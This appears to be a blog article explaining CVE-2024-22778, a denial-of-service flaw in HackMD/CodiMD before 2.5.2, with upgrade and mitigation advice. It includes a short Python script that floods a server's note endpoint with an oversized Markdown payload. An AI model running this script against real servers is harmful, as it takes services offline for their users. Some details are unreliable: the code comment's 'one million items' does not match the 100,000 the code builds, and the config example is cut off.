CVE-2024-22778 - How HackMD / CodiMD <2.5.2 Suffered a Denial of Service Vulnerability

HackMD and its open source fork CodiMD are popular collaborative Markdown editors used by teams, developers, and students all over the world. While these tools help people write documents together in real-time, they must remain secure and stable under all scenarios. Unfortunately, a Denial of Service (DoS) vulnerability—CVE-2024-22778—was found affecting all versions before 2.5.2. In this article, we’ll break down how this vulnerability works, how it can be exploited, and what you should do to protect yourself.

What Is CVE-2024-22778?

CVE-2024-22778 is a security flaw in CodiMD and HackMD’s code that makes it possible for a remote attacker to crash the server or render it unusable with a specially crafted request. This is called a “Denial of Service” (DoS) attack: instead of stealing data, the attacker just knocks your service offline!

According to the official advisory published on GitHub and the MITRE CVE database, this bug is triggered due to improper handling of certain user input. Specifically, untrusted data sent to the server could overload its resources (like memory or CPU), causing the service to hang or crash.

A Simple Explanation (What Happened?)

If you have an old HackMD or CodiMD server (any version before 2.5.2), an attacker can send a large and malicious input (for example, a huge Markdown document or nested data structure) to your server. Because the app doesn't properly limit or clean this input, it may take up all available memory or processor time, leading the process (and often the whole server) to become unresponsive.

Exploit Example: Easy Denial of Service

> Disclaimer: The following code is for educational purposes only. Never attack systems you do not own or have permission to test!

Attackers could use a script to submit a very large payload (like a giant note, or a note with extreme nesting) to the endpoint that processes Markdown notes. Modern CodiMD and HackMD installations with patch applied will reject or safely handle such input.

Here’s a Python example demonstrating the concept

import requests

# Replace this with your target HackMD/CodiMD server
url = "https://your.codimd.server/new";

# Craft a gigantic Markdown payload
payload = "# Title\n" + ("\n\n".join(["- item"] * 100000))  # One million items!

# Send the oversized payload
response = requests.post(
    url, 
    data={'content': payload}
)

print("Status Code:", response.status_code)

In reality, an attacker might adjust payloads or endpoints (such as /api/notes/ or /sockets/) based on your deployment and CodiMD/HackMD version.

When this is done on a vulnerable instance, server memory or CPU skyrockets—sometimes crashing the Node.js process or causing a full stoppage of service until manually restarted.

Behind the Scenes: Why Was This Possible?

Early versions of CodiMD/HackMD had limited checks around the size and structure of incoming user input. For Markdown editors, handling user content is core to the app, so attackers could upload notes that are way bigger or more complex than any normal usage.

Modern web servers should always enforce limits—especially for user-generated content! Lack of such controls let this DoS condition happen in CodiMD/HackMD before 2.5.2.

The Fix

The vulnerability was patched in the release of 2.5.2:

- Input validation was added, rejecting too-large Markdown documents or deeply nested structures before they hit the processor.

Safer error handling ensures the app remains up, even in the face of well-crafted input.

Check out the official patch and release notes for details.

What Should You Do?

- Upgrade immediately to HackMD/CodiMD version 2.5.2 or newer.
- If you are running an older version and can’t upgrade, set up a web proxy (like NGINX) in front of your server to limit the maximum request/body size, e.g.:

...

}

`

- Always keep all collaborative editing tools up to date. Subscribe to their GitHub or security mailing lists for alerts.

References

- CVE-2024-22778 on NIST NVD
- CodiMD/HackMD Security Advisory
- Patch Pull Request
- Release Notes 2.5.2

In Closing

Denial of Service vulnerabilities don’t steal your data, but they can keep you away from it—and even a small bug can have huge consequences. If you use HackMD or CodiMD for your team docs or class notes, don’t wait: update now and stay secure. Always keep watch for updates and keep your collaborative spaces safe!

Timeline

Published on: 02/21/2024 15:15:09 UTC
Last modified on: 11/06/2024 17:35:29 UTC